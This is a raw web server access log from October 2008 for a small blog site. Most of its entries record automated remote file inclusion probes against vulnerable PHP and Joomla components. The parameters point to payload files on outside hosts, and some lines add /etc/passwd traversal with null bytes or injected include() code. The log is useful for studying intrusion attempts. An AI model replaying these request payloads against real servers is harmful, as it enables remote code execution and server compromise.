98.136.50.138 - - [23/Oct/2008:09:07:37 -0700] "GET /logs/access_080809.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.238.98 - - [23/Oct/2008:09:07:38 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.artemisfm.gr/main/sistem.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:07:39 -0700] "GET /logs/access_080205.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.238.98 - - [23/Oct/2008:09:07:39 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.artemisfm.gr/main/sistem.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.22.6.28 - - [23/Oct/2008:09:07:39 -0700] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:07:45 -0700] "GET /logs/access_080106.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:07:46 -0700] "GET /logs//ADMIN/header.php?language=/../../../../../etc/passwd%00http://geocities.com/aolresulted/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:07:46 -0700] "GET /ADMIN/header.php?language=/../../../../../etc/passwd%00http://geocities.com/aolresulted/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:07:53 -0700] "GET /logs/access_080807.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:07:58 -0700] "GET /logs/access_080821.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:08:09 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:08:10 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.22.6.28 - - [23/Oct/2008:09:08:23 -0700] "GET /logs/access_080829.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:08:28 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:08:29 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:08:33 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.181.129.178 - - [23/Oct/2008:09:08:34 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:08:34 -0700] "GET /logs/access_080331.log//?_zb_path=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
194.181.129.178 - - [23/Oct/2008:09:08:34 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.22.6.28 - - [23/Oct/2008:09:08:42 -0700] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:08:49 -0700] "GET /logs/scripts.log//tools/errors.php?error=http://www.moppedtreffen.de/icon/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [23/Oct/2008:09:08:49 -0700] "GET /tools/errors.php?error=http://www.moppedtreffen.de/icon/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:08:49 -0700] "GET /logs//tools/errors.php?error=http://www.moppedtreffen.de/icon/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [23/Oct/2008:09:08:56 -0700] "GET /logs/scripts.log//tools/errors.php?error=http://www.moppedtreffen.de/icon/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [23/Oct/2008:09:08:56 -0700] "GET /tools/errors.php?error=http://www.moppedtreffen.de/icon/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [23/Oct/2008:09:08:57 -0700] "GET /logs//tools/errors.php?error=http://www.moppedtreffen.de/icon/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [23/Oct/2008:09:09:02 -0700] "GET /logs/scripts.log//tools/errors.php?error=http://www.moppedtreffen.de/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [23/Oct/2008:09:09:02 -0700] "GET /tools/errors.php?error=http://www.moppedtreffen.de/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:09:03 -0700] "GET /logs//tools/errors.php?error=http://www.moppedtreffen.de/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.31 - - [23/Oct/2008:09:09:12 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:09:14 -0700] "GET /blog/?show=slide&pageid=169 HTTP/1.1" 200 157853 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:09:33 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:09:33 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.215.50 - - [23/Oct/2008:09:09:43 -0700] "GET /logs/scripts.log//tools/errors.php?error=http://www.gosgo.com/bbs/idj.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [23/Oct/2008:09:09:43 -0700] "GET /tools/errors.php?error=http://www.gosgo.com/bbs/idj.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [23/Oct/2008:09:09:43 -0700] "GET /logs//tools/errors.php?error=http://www.gosgo.com/bbs/idj.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [23/Oct/2008:09:09:44 -0700] "GET /logs/scripts.log//tools/errors.php?error=http://geocities.com/aolresulted/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:09:45 -0700] "GET /tools/errors.php?error=http://geocities.com/aolresulted/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [23/Oct/2008:09:09:45 -0700] "GET /logs//tools/errors.php?error=http://geocities.com/aolresulted/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.226.28 - - [23/Oct/2008:09:09:52 -0700] "GET /logs/access_080913.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.moppedtreffen.de/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.22.6.28 - - [23/Oct/2008:09:09:58 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:09:59 -0700] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:10:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:10:00 -0700] "GET /logs/access_080514.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:10:13 -0700] "GET /logs/access_080812.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:10:16 -0700] "GET /logs/access_080517.log/admin.wmtgallery.phphttp://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.197.222.85 - - [23/Oct/2008:09:10:16 -0700] "GET /admin.wmtgallery.phphttp://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.197.222.85 - - [23/Oct/2008:09:10:16 -0700] "GET /logs/admin.wmtgallery.phphttp://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.197.222.85 - - [23/Oct/2008:09:10:17 -0700] "GET /logs/access_080619.log/admin.wmtgallery.phphttp://sistemas.unilestemg.br/ping/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
78.111.80.12 - - [23/Oct/2008:09:10:18 -0700] "GET /logs/oneadmin/config.php?path[docroot]=http://sansalang.net/technote7/data/temp/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.111.80.12 - - [23/Oct/2008:09:10:18 -0700] "GET /oneadmin/config.php?path[docroot]=http://sansalang.net/technote7/data/temp/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:10:18 -0700] "GET /logs/access_080311.log/oneadmin/config.php?path[docroot]=http://sansalang.net/technote7/data/temp/Gang11/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.238.98 - - [23/Oct/2008:09:10:18 -0700] "GET /logs/xGB.php?act=admin&do=http://www.artemisfm.gr/main/sistem.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.238.98 - - [23/Oct/2008:09:10:18 -0700] "GET /xGB.php?act=admin&do=http://www.artemisfm.gr/main/sistem.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:10:23 -0700] "GET /logs/access_080624.log//modules/agendax/addevent.inc.php?agendax_path=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:10:26 -0700] "GET /logs/access_080917.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:10:27 -0700] "GET /logs/access_080917.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.63.130.154 - - [23/Oct/2008:09:10:28 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 200 95354 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:10:28 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 200 95338 "-" "libwww-perl/5.805" "www.dmulk.com"
92.63.130.154 - - [23/Oct/2008:09:10:29 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.63.130.154 - - [23/Oct/2008:09:10:29 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:10:35 -0700] "GET /logs/access_080812.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.22.6.28 - - [23/Oct/2008:09:10:39 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:10:41 -0700] "GET /logs/access_080819.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.161 - - [23/Oct/2008:09:10:47 -0700] "GET /tools/errors.php?error=http://200.180.223.130/~elaine/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:10:52 -0700] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:10:53 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.105.248.78 - - [23/Oct/2008:09:10:53 -0700] "GET /index.php?DOCUMENT_ROOT=http://portal2.sre.gob.mx/enlace/HELP/screen.adminmodules.txt?? HTTP/1.1" 200 95062 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [23/Oct/2008:09:10:53 -0700] "GET /logs/access_080514.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.ebejby.eu/info/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.30.20.130 - - [23/Oct/2008:09:10:56 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.30.20.130 - - [23/Oct/2008:09:10:58 -0700] "GET /includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.30.20.130 - - [23/Oct/2008:09:10:58 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:08 -0700] "GET /logs/access_080722.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:15 -0700] "GET /logs/access_080819.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:11:17 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.206.96.121 - - [23/Oct/2008:09:11:17 -0700] "GET /logs/access_080902.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:21 -0700] "GET /logs/access_080125.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:11:26 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:28 -0700] "GET /blog/index.php/page/2/?show=slide&pageid=172 HTTP/1.0" 200 13543 "http://search.live.com/results.aspx?q=motorcycles" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:29 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/page/2/?show=slide&pageid=172" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.189 - - [23/Oct/2008:09:11:30 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/page/2/?show=slide&pageid=172" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:30 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/page/2/?show=slide&pageid=172" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:30 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://dmulk.com/blog/page/2/?show=slide&pageid=172" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.189 - - [23/Oct/2008:09:11:31 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://dmulk.com/blog/page/2/?show=slide&pageid=172" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.189 - - [23/Oct/2008:09:11:31 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://dmulk.com/blog/page/2/?show=slide&pageid=172" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
201.30.20.130 - - [23/Oct/2008:09:11:32 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:32 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:32 -0700] "GET /components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:11:32 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:35 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
201.30.20.130 - - [23/Oct/2008:09:11:35 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
201.30.20.130 - - [23/Oct/2008:09:11:35 -0700] "GET /logs/access_080906.log//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:35 -0700] "GET /components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:41 -0700] "GET /logs/access_080115.log//ADMIN/header.php?language=/../../../../../etc/passwd%00http://geocities.com/aolresulted/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [23/Oct/2008:09:11:42 -0700] "GET /ADMIN/header.php?language=/../../../../../etc/passwd%00http://geocities.com/aolresulted/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [23/Oct/2008:09:11:42 -0700] "GET /logs//ADMIN/header.php?language=/../../../../../etc/passwd%00http://geocities.com/aolresulted/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [23/Oct/2008:09:11:42 -0700] "GET /logs/access_080115.log//ADMIN/header.php?language=/../../../../../etc/passwd%00http://www.gosgo.com/bbs/idj.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:42 -0700] "GET /ADMIN/header.php?language=/../../../../../etc/passwd%00http://www.gosgo.com/bbs/idj.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:42 -0700] "GET /logs//ADMIN/header.php?language=/../../../../../etc/passwd%00http://www.gosgo.com/bbs/idj.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.20.53.210 - - [23/Oct/2008:09:11:46 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:46 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.seminolewarhawkband.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:49 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
201.30.20.130 - - [23/Oct/2008:09:11:49 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
201.30.20.130 - - [23/Oct/2008:09:11:49 -0700] "GET /components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:50 -0700] "GET /logs/access_080906.log//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:11:51 -0700] "GET /logs/access_080722.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.30.20.130 - - [23/Oct/2008:09:11:57 -0700] "GET /logs/access_080906.log//components/com_flyspray/startdown.php?file=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:12:05 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.63.130.154 - - [23/Oct/2008:09:12:05 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:12:05 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.63.130.154 - - [23/Oct/2008:09:12:06 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.117.252.226 - - [23/Oct/2008:09:12:11 -0700] "GET /logs/access_080902.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:12:16 -0700] "GET /logs/access_080125.log/?sourcedir=http://www.focusweb.org/modules/simplepie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.192.164 - - [23/Oct/2008:09:12:19 -0700] "GET /logs/access_080627.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
